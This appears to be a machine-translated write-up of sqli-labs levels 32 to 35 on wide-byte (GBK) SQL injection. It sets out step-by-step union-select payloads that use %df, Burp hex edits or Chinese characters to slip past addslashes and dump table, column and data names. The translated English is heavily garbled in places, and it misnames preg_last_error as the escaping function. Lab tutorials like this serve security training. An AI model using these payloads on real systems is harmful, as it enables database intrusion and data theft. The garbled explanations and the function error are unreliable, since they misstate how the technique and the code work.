SQL Lab (32~35) contains the principle understanding and precautions of wide byte injection (continuously updated later)

(32~35) Contains the Principle understanding and precautions of wide byte injection

sql-lab-32

Let's start with 32 Pass on a parameter , Find out ：

1\'and 1=2 

ad locum \ Representative means ‘ escape ’, Take the back one ‘ Escape into a string , Make single quotation marks no longer have ’ effect ‘, just ’ Content ’ nothing more , In other words, this single quotation mark cannot play the role of closing with the front and back single quotation marks , Make the following input not be executed as code .

So we have two ways ：

1. Give Way \ No use
2. Give Way \ disappear

Right and train of thought I , We can try to \ Transference , Make it lose escape ‘ The role of .

Wide byte is expanded according to idea 2 .

1. When the size of a character is one byte , Call its characters narrow bytes .
2. When the size of a character is two bytes , Call its characters wide bytes .
3. All English takes one byte by default , Chinese characters take up two bytes
4. Common wide byte encoding ：GB2312,GBK,GB18030,BIG5,Shift_JIS wait

Wide byte injection ：

1. client 、 adjoining course 、 Result set All are GBK code
2. Use iconv Character set conversion , take UTF-8 To GBK, meanwhile ,set names The character set is GBK. Submit %e9%8c%a6 that will do .
3. Use set names UTF-8 It specifies UTF-8 Character set , And also use the escape function to escape . occasionally , In order to avoid confusion , Some users will submit GBK Character usage iconv function （ perhaps mb_convert_encoding） First to UTF-8, Then spell it SQL sentence .

** summary ：** Wide byte injection can be performed as long as there are wide bytes .

The code of this page is inconsistent with that of the database , So there is a use iconv Wait for the conversion function to convert the character set , But in this topic Here's the problem .

for example ：

When we are using url Coding is so php The code accepts %df%27** Submit the user when url Coded %df%27 Read it , Find out %27 It means single quotation mark , So we add escape characters \ Transference , So it becomes %df%5c%27, there %5c Namely \ Of url Encoded form . The problem is formed here , When PHP When the code executes the database , Will execute jbk Code conversion , stay jbk In the coding table %df%5c It represents a brand new Chinese character , So that the single quotation marks escape .

Previous ascii code > 128, Two characters can be combined into Chinese characters

In the above example, there is actually more than one injection form , As long as in the last jbk A brand new Chinese character can be formed in the coding .（ But the predecessors on the Internet all use the same example , It's better to inherit this tradition . Hey ）

Summarize the practice of this topic ：

Determine whether there is injection ：?id=1 %df’and 1=1 – q ?id=1 %df’and 1=2 – q

Determine the number of fields ：?id=1 %df’ order by 3 – q

The judgment is obviously misplaced ：?id=-1 %df’ union select 1,2,3 – q

Judge database name ：?id=-1 %df’ union select 1,database(),3 – q

Name of judgment table ：?id=-1 %df’ union select 1,table_name ,3 from information_schema.tables where table_schema= database() – q

Judge the listing ：?id=-1 %df’ union select 1,column_name ,3 from information_schema.columns where table_schema= database() and table_name=0x656d61696c73-- q

• Here we can put emails Convert to hex , Thus eliminating the use of single quotation marks .**

mysql Statement can recognize hexadecimal code

• notes ：
  • It cannot be used here %df‘ Because if after use after jbk code our SQL The statement will Turn into ： Yun ’emalis Yun ‘ thus sql Injection failed .

Judgment data ： ?id=-1 %df’ union select 1,id,3 from emails-- q

At the same time, let's observe 32 Off php Source code

function check_addslashes($string)
{
    
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
      
    
    return $string;
}

There is a new function we haven't seen ：

    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          

preg_last_error Function is used to escape regular expression characters .

Special characters of regular expressions are ：’ . \ + * ? [ ^ ] $ ( ) { } = ! < > | : -

Summary of common codes ：

• ASCII Only English symbols and letters are encoded ,GB2312 For English symbols , English letter , Chinese characters are encoded ,UTF8 It encodes all the languages in the world , therefore ,GB1212 The characters of contain ASCII character ,UTF8 Contains GB2312 character .

gbk And utf8 The difference and comparison of

• GBK The text encoding of is represented by double bytes ,UTF－8 Encoding is a multi byte encoding for international characters .

• GBK Contains all Chinese characters ;UTF-8 It contains the characters needed by all countries in the world .

• GBK It's in the national standard GB2312 On this basis, it is compatible after expansion GB2312 Standards for （ It doesn't seem to be a national standard yet ）

• UTF-8 Coded text can be supported in various countries UTF8 The character set is displayed on the browser .

  • such as , If it is UTF8 code , In foreigners' English IE It can also show Chinese on , Without them downloading IE Chinese language support package for . therefore , For forums with more English , Use GBK Then each character takes 2 Bytes , While using UTF－8 English is only one byte .

• UTF8 It's international code , It has good versatility , Foreigners can also browse the forum ,GBK It's the country code , Versatility is better than UTF8 Bad , however UTF8 The database occupied is more than GBK Big .

  Reprinted literature ：

  (1 Bar message ) Select the encoding method for the database （GBK、UTF-8）_JarryLiu The column -CSDN Blog _ Coding format of database

notes ：

1. The times are developing ,utf-8 Development is the general trend , and utf-8 It can also avoid problems caused by many bytes

2. Use caution iconv To convert string encoding , It's easy to show up The statement （ Wide byte injection cannot be avoided ）. As long as we put the front end html/js/css All codes are set to gbk,mysql/php Code set to gbk, There will be no confusion . There is no need to call iconv Transcoding , Cause unnecessary trouble .

3. Be careful with wide byte encoding ！！！

sql-lab-33

The practice of the thirty three levels is exactly the same as that of the thirty two levels

Determine the number of fields ：?id=1 %df’ order by 3 – q

The judgment is obviously misplaced ：?id=-1 %df’ union select 1,2,3 – q

Judge database name ：?id=-1 %df’ union select 1,database(),3 – q

Name of judgment table ：?id=-1 %df’ union select 1,table_name ,3 from information_schema.tables where table_schema= database() – q

Judge the listing ：?id=-1 %df’ union select 1,column_name ,3 from information_schema.columns where table_schema= database() and table_name=0x656d61696c73-- q

Judgment data ： ?id=-1 %df’ union select 1,id,3 from emails-- q

Looking at the source code, we find , The only difference is ：

In the filter section php function ：

Thirty two passes are written manually , Thirty three levels are used php Function to filter

unction check_addslashes($string)
{
    
    $string= addslashes($string);    
    return $string;
}

addslashes() Function returns in Predefined characters Before * Add backslash String .

The predefined characters are ：

• Single quotation marks （’）
• Double quotes （"）
• The backslash （\）
• NULL

sql-lab-34

stay 34 Guan, we saw the familiar backslash

So let's try 32 About wide byte injection mentioned , Use %df And ‘ Combine

Find out ：

%df And \ combination By jbk Code as Chinese characters .

Compare to the front 32 Close directly at url Column to inject , our 34 Close in the input box to inject . Find out , stay url Enter... In the column %df mainly 16 Input in hexadecimal form , In the input box, enter %df Is entered as a normal string .

url A code is a character ascii The hexadecimal of the code . But there are some changes , You need to add “%”. such as “\”, its ascii Code is 92,92 The hexadecimal of is 5c, therefore “\” Of url The encoding is %5c.

So in this question , We can ：

1. Use burp suit
2. Use Chinese characters to bypass .

First, let's explain the first method ：

Input a’or 1=2 – q,

Grab it , stay hex The page will a Of 16 The hexadecimal code is changed to df( In essence, it is to use a character casually , stay hex Pages enable df Write before single quotation marks , And \ Combine to form new Chinese characters )

notes ： Here df send 16 In base number A character

Then put the bag on it

The second method

Nature and %df similar Some Chinese characters are encoded as three bytes , Let's take three bytes apart , The first two are a group , The back one and \ Phase encoding is two bytes to bypass , Thus, single quotation marks escape .

So we can ：

Determine the number of fields ： han ’or 1=1 order by 3 – q

The judgment is obviously misplaced ： han ’union select 1,2 – q

Judge database name ： han ’union select 1,database()-- q

Name of judgment table ： han ’union select 1,table_name from information_schema.tables where table_schema= database() – q

Judge the listing ： han ’union select 1,column_name from information_schema.columns where table_schema= database() and table_name=0x656d61696c73-- q

Judgment data ： han ’union select 1,id from emails-- q

sql-lab-35

According to the ideas of the previous questions , Let's try to close , Sure enough Find out ’ It's commented out , Then we try to use %df , Use burpsuit hex Or Chinese characters to bypass , however , It's no use finding out

In fact, this question gave us a hint at the beginning

He said why should he care addslashes() function , In other words, here php Functions are useless

let me put it another way , There may be no closure here .

Let's try , It was found that this was true

Determine if there is an injection point ：?id=1 and 1=1-- q

Determine the number of fields ：?id=1 order by 3-- q

The judgment is obviously misplaced ： ?id=-1 union select 1,2,3-- q

Judge database name ：?id=-1 union select 1,2,database() – q

Name of judgment table ：?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- q

​ ?id=-1 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,1-- q

Judge the listing ：?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x656d61696c73 – q

​ ?id=-1 union select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name=0x656d61696c73 limit 0,1-- q

notes ： In the use of # When you comment limit 0,1 Not available

Because in the browser url In the bar # It's the anchor point During the transfer process, it will not be brought to the back end

Judgment data ：?id=-1 union select 1,id ,3 from emails – q